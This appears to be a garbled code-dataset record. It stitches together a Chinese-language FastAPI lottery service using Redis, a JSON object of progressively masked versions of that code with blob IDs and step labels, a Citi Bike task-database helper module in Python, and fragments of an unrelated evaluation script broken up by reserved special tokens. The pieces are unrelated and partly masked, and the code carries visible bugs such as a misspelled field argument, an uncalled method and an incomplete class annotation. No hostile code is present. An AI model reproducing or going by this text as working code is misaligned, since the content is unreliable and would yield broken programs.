luckdict[ward.name] = ward.count
for i in range(ward.count):
lucklist.append(ward.name)
othercount = item.total - len(lucklist)
if othercount:
luckdict[item.other] = othercount
others = [item.other] * othercount
lucklist = lucklist + others
random.shuffle(lucklist)
print(lucklist)
for luck in lucklist:
rq.put(luck)
myredis.hmset(item.luckname,luckdict)
result = {
'ret': 0,
'msg': "succses"
}
return result
@app.get('/luck', tags = ["抽奖接口"], summary="抽奖接口")
def luck(id: int,luckname: str):
"""
开始抽奖
"""
rd = RedisQueue(luckname)
myredis = MyRedis()
winner = luckname+"_winner"
if myredis.hexists(winner,id):
return {
"ret":0,
"msg":"您已经抽过了,不能再抽了"
}
award = rd.get_nowait()
if award:
myredis.hset(winner,id,award)
myredis.hincrby(luckname,award,-1)
result = {
"ret":0,
'data':{
"flag":1,
"msg":"恭喜你中奖了",
"award":award
}
}
else:
result = {
"ret":0,
'data':{
"flag":0,
"msg":"奖抽完了",
}
}
return result
@app.get('/luckman',tags = ["抽奖接口"],summary="查看中奖名单")
def luckman(luckname: str):
myredis = MyRedis()
winner = luckname + "_winner"
winnerlist = myredis.hgetall(winner)
print(winnerlist)
return {
"ret":0,
"data":winnerlist
}
@app.get('/remaining',tags = ["抽奖接口"],summary="查看剩余奖品列表")
def Remaining(luckname: str):
myredis = MyRedis()
remainlist = myredis.hgetall(luckname)
print(remainlist)
return {
"ret":0,
"data":remainlist
}
|
normal
|
{
"blob_id": "4550ed971eef36badf46a44adcc593324a5292cf",
"index": 2637,
"step-1": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\n<mask token>\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n<mask token>\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n<mask token>\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-2": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\n<mask token>\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n<mask token>\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-3": "<mask token>\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\napp = FastAPI()\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n@app.get('/')\ndef read_root():\n return {'Hello': 'World'}\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-4": "from typing import Optional, List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field\nfrom redisqueue import RedisQueue, MyRedis\nimport random\n\n\nclass Award(BaseModel):\n name: str\n count: int\n\n\nclass Item(BaseModel):\n luckname: str = Field(..., title='抽奖规则名称', max_lenght=300)\n total: int = Field(..., title='抽奖总人数', gt=0)\n award: Optional[List[Award]] = Field(None, title='奖品列表')\n other: str = Field(..., title='参与奖或者未中奖')\n\n\napp = FastAPI()\n\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n\n@app.get('/')\ndef read_root():\n return {'Hello': 'World'}\n\n\n@app.post('/delect', tags=['抽奖接口'], summary='删除抽奖规则')\ndef delect(name: str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {'ret': 0, 'msg': '删除成功'}\n\n\n@app.post('/creat', tags=['抽奖接口'], summary='创建抽奖规则')\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print('ok')\n if rq.qsize():\n return {'ret': 500, 'msg': '该抽奖已经存在,请删除后重试'}\n result = {'ret': 0, 'item': item}\n awardlist = item.award\n lucklist = []\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n myredis.hmset(item.luckname, luckdict)\n result = {'ret': 0, 'msg': 'succses'}\n return result\n\n\n@app.get('/luck', tags=['抽奖接口'], summary='抽奖接口')\ndef luck(id: int, luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname + '_winner'\n if myredis.hexists(winner, id):\n return {'ret': 0, 'msg': '您已经抽过了,不能再抽了'}\n award = rd.get_nowait()\n if award:\n myredis.hset(winner, id, award)\n myredis.hincrby(luckname, award, -1)\n result = {'ret': 0, 'data': {'flag': 1, 'msg': '恭喜你中奖了', 'award':\n award}}\n else:\n result = {'ret': 0, 'data': {'flag': 0, 'msg': '奖抽完了'}}\n return result\n\n\n@app.get('/luckman', tags=['抽奖接口'], summary='查看中奖名单')\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + '_winner'\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {'ret': 0, 'data': winnerlist}\n\n\n@app.get('/remaining', tags=['抽奖接口'], summary='查看剩余奖品列表')\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {'ret': 0, 'data': remainlist}\n",
"step-5": "from typing import Optional,List\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field\n\nfrom redisqueue import RedisQueue,MyRedis\nimport random\n\nclass Award(BaseModel):\n name: str\n count: int\n\nclass Item(BaseModel):\n luckname: str = Field(...,title=\"抽奖规则名称\",max_lenght = 300)\n total: int = Field(...,title=\"抽奖总人数\",gt=0)\n award: Optional[List[Award]] = Field(None,title=\"奖品列表\")\n other: str = Field(...,title=\"参与奖或者未中奖\")\napp = FastAPI()\n\nclass ResSuccess(BaseModel):\n ret: int = 0\n data\n\n@app.get('/')\ndef read_root():\n return {\"Hello\":\"World\"}\n\n@app.post(\n '/delect', \n tags = [\"抽奖接口\"],\n summary = \"删除抽奖规则\"\n )\ndef delect(name:str):\n rq = RedisQueue(name)\n if rq.qsize:\n rq.lpop(name)\n return {\n 'ret':0,\n 'msg':\"删除成功\"\n }\n\n@app.post(\n '/creat',\n tags = ['抽奖接口'],\n summary=\"创建抽奖规则\"\n)\ndef creat(item: Item):\n \"\"\"\n 通过该接口可以创建一个抽奖规则\n \"\"\"\n myredis = MyRedis()\n rq = RedisQueue(item.luckname)\n print(\"ok\")\n if rq.qsize():\n return {\n \"ret\":500,\n \"msg\":\"该抽奖已经存在,请删除后重试\"\n }\n result = {\"ret\":0, \"item\":item}\n awardlist = item.award\n lucklist =[]\n luckdict = {}\n for ward in awardlist:\n luckdict[ward.name] = ward.count\n for i in range(ward.count):\n lucklist.append(ward.name)\n othercount = item.total - len(lucklist)\n\n if othercount:\n luckdict[item.other] = othercount\n others = [item.other] * othercount\n \n lucklist = lucklist + others\n random.shuffle(lucklist)\n print(lucklist)\n for luck in lucklist:\n rq.put(luck)\n \n myredis.hmset(item.luckname,luckdict)\n\n result = {\n 'ret': 0,\n 'msg': \"succses\"\n }\n return result\n\n@app.get('/luck', tags = [\"抽奖接口\"], summary=\"抽奖接口\")\ndef luck(id: int,luckname: str):\n \"\"\"\n 开始抽奖\n \"\"\"\n rd = RedisQueue(luckname)\n myredis = MyRedis()\n winner = luckname+\"_winner\"\n if myredis.hexists(winner,id):\n return {\n \"ret\":0,\n \"msg\":\"您已经抽过了,不能再抽了\"\n }\n award = rd.get_nowait()\n if award:\n myredis.hset(winner,id,award)\n myredis.hincrby(luckname,award,-1)\n \n result = {\n \"ret\":0,\n 'data':{\n \"flag\":1,\n \"msg\":\"恭喜你中奖了\",\n \"award\":award\n }\n }\n else:\n result = {\n \"ret\":0,\n 'data':{\n \"flag\":0,\n \"msg\":\"奖抽完了\",\n }\n }\n \n return result\n\n@app.get('/luckman',tags = [\"抽奖接口\"],summary=\"查看中奖名单\")\ndef luckman(luckname: str):\n myredis = MyRedis()\n winner = luckname + \"_winner\"\n winnerlist = myredis.hgetall(winner)\n print(winnerlist)\n return {\n \"ret\":0,\n \"data\":winnerlist\n }\n\n@app.get('/remaining',tags = [\"抽奖接口\"],summary=\"查看剩余奖品列表\")\ndef Remaining(luckname: str):\n myredis = MyRedis()\n remainlist = myredis.hgetall(luckname)\n print(remainlist)\n return {\n \"ret\":0,\n \"data\":remainlist\n }\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
import csv
import sqlite3
import time
from datetime import datetime, timedelta
import pandas as pd
import pytz
import json
import urllib
import numpy as np
DATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'
def execute_query(cur,query, args=()):
cur = cur.execute(query, args)
rows = cur.fetchall()
# cur.close()
return rows
def convertTime(et):
"""'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' """
hour = int(et[11:13])
if et.find('PM') != -1 and hour != 12:
dateString = et[:10]
hour = hour + 12
et = dateString + ' ' + str(hour) + et[13:19]
elif et.find('AM') != -1 and hour == 12:
dateString = et[:10]
hour = 0
et = dateString + ' ' + '0'+str(hour) + et[13:19]
else:
et = et[:19]
return et
def getNYtimenow():
tz = pytz.timezone('America/New_York')
time = str(datetime.now(tz))[:19]
return time
def datetimeStringToObject(timeString):
"""convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object"""
try:
year = int(timeString[:4])
month = int(timeString[5:7])
day = int(timeString[8:10])
hour = int(timeString[11:13])
minute = int(timeString[14:16])
result = datetime(year, month, day, hour, minute)
return result
except:
return None
def timeStringToObject(timeString):
"""convert a string in format hh:mm:ss to a datetime object with current date"""
try:
# year = datetime.now().year
# month = datetime.now().month
# day = datetime.now().day
hour = int(timeString[:2])
minute = int(timeString[3:5])
result = datetime.today().replace(hour=hour, minute=minute, second=0, microsecond=0)
return result
except:
return None
def notSignedIn(vID):
"""Return true is the drivers did not enter vehicle ID,
return False if the drivers have entered the vehicle ID"""
if str(vID) == '0':
return True
return False
def resetEstComp(cur, vID):
"""estimate completion time goes to 0"""
cur.execute("""UPDATE OpenTasks SET estComplete = null WHERE vID = ? """,[vID])
def getNextFixOrderNum(cur,vID):
"""return the integer which is one larger than the order number of the last fixed task"""
orderNum = execute_query(cur, """SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1""", [vID])[0][0]
orderNum = int(orderNum) + 1
return orderNum
def getNextOrderNum(cur,vID):
"""return the integer which is one larger than the order number of the last task"""
orderNum = execute_query(cur,"""SELECT Count(*) FROM OpenTasks where vID = ?""", [vID])[0][0]
orderNum = int(orderNum) + 1
return orderNum
def fixOrderBeforeInsert(cur,vID,orderNum):
"""Increment later tasks' order number by 1, orderNum is the order of the inserted task
should be called before inserting the task """
cur.execute("""UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?""",[vID, orderNum])
|
normal
|
{
"blob_id": "9b8b196e1ad845ab745dabe5abe3be7bea0d5695",
"index": 4835,
"step-1": "<mask token>\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\n<mask token>\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\n<mask token>\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=\n 0, microsecond=0)\n return result\n except:\n return None\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef getNextOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ?', [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef fixOrderBeforeInsert(cur, vID, orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\n 'UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?'\n , [vID, orderNum])\n",
"step-4": "import csv\nimport sqlite3\nimport time\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport pytz\nimport json\nimport urllib\nimport numpy as np\nDATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'\n\n\ndef execute_query(cur, query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\"\n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0' + str(hour) + et[13:19]\n else:\n et = et[:19]\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=\n 0, microsecond=0)\n return result\n except:\n return None\n\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\"\n cur.execute('UPDATE OpenTasks SET estComplete = null WHERE vID = ? ', [vID]\n )\n\n\ndef getNextFixOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1', [vID])[\n 0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef getNextOrderNum(cur, vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\n 'SELECT Count(*) FROM OpenTasks where vID = ?', [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\n\ndef fixOrderBeforeInsert(cur, vID, orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\n 'UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?'\n , [vID, orderNum])\n",
"step-5": "import csv\nimport sqlite3\nimport time\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport pytz\nimport json\nimport urllib\nimport numpy as np\n\nDATABASE = '/var/www/html/citibikeapp/citibikeapp/citibike_change.db'\n\ndef execute_query(cur,query, args=()):\n cur = cur.execute(query, args)\n rows = cur.fetchall()\n # cur.close()\n return rows\n\n\ndef convertTime(et):\n \"\"\"'2017-06-01 11:41:53 AM' to '2017-06-01 11:41:53' \"\"\" \n hour = int(et[11:13])\n if et.find('PM') != -1 and hour != 12:\n dateString = et[:10]\n hour = hour + 12\n et = dateString + ' ' + str(hour) + et[13:19]\n elif et.find('AM') != -1 and hour == 12:\n dateString = et[:10]\n hour = 0\n et = dateString + ' ' + '0'+str(hour) + et[13:19]\n else:\n et = et[:19]\n\n return et\n\n\ndef getNYtimenow():\n tz = pytz.timezone('America/New_York')\n time = str(datetime.now(tz))[:19]\n return time\n\ndef datetimeStringToObject(timeString):\n \"\"\"convert a string in format YYYY-MM-DD hh:mm:ss to a datetime object\"\"\"\n try:\n year = int(timeString[:4])\n month = int(timeString[5:7])\n day = int(timeString[8:10])\n hour = int(timeString[11:13])\n minute = int(timeString[14:16])\n result = datetime(year, month, day, hour, minute)\n return result\n except:\n return None\n\ndef timeStringToObject(timeString):\n \"\"\"convert a string in format hh:mm:ss to a datetime object with current date\"\"\"\n try:\n # year = datetime.now().year\n # month = datetime.now().month\n # day = datetime.now().day\n hour = int(timeString[:2])\n minute = int(timeString[3:5])\n result = datetime.today().replace(hour=hour, minute=minute, second=0, microsecond=0)\n return result\n except:\n return None\n\ndef notSignedIn(vID):\n \"\"\"Return true is the drivers did not enter vehicle ID, \n return False if the drivers have entered the vehicle ID\"\"\"\n if str(vID) == '0':\n return True\n return False\n\n\ndef resetEstComp(cur, vID):\n \"\"\"estimate completion time goes to 0\"\"\" \n cur.execute(\"\"\"UPDATE OpenTasks SET estComplete = null WHERE vID = ? \"\"\",[vID])\n\ndef getNextFixOrderNum(cur,vID):\n \"\"\"return the integer which is one larger than the order number of the last fixed task\"\"\"\n orderNum = execute_query(cur, \"\"\"SELECT Count(*) FROM OpenTasks where vID = ? and fixTask = 1\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\ndef getNextOrderNum(cur,vID):\n \"\"\"return the integer which is one larger than the order number of the last task\"\"\"\n orderNum = execute_query(cur,\"\"\"SELECT Count(*) FROM OpenTasks where vID = ?\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum\n\ndef fixOrderBeforeInsert(cur,vID,orderNum):\n \"\"\"Increment later tasks' order number by 1, orderNum is the order of the inserted task\n should be called before inserting the task \"\"\"\n cur.execute(\"\"\"UPDATE OpenTasks SET orderNum = orderNum + 1 WHERE vID = ? and orderNum >= ?\"\"\",[vID, orderNum])",
"step-ids": [
4,
7,
10,
12,
13
]
}
|
[
4,
7,
10,
12,
13
] |
<|reserved_special_token_0|>
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _read_truthfile(filepath):
with open(filepath, 'r') as f:
truth_pairs = [tuple(sorted(line.strip().split())) for line in f]
return set(truth_pairs)
def _get_stats(candidate_pairs, truth_pairs):
tp = len(candidate_pairs.intersection(truth_pairs))
prec = 1.0 * tp / len(candidate_pairs)
rec = 1.0 * tp / len(truth_pairs)
print(' returned: %d, tp=%.4f, prec=%.4f, rec=%.4f' % (len(
candidate_pairs), tp, prec, rec))
return prec, rec
<|reserved_special_token_0|>
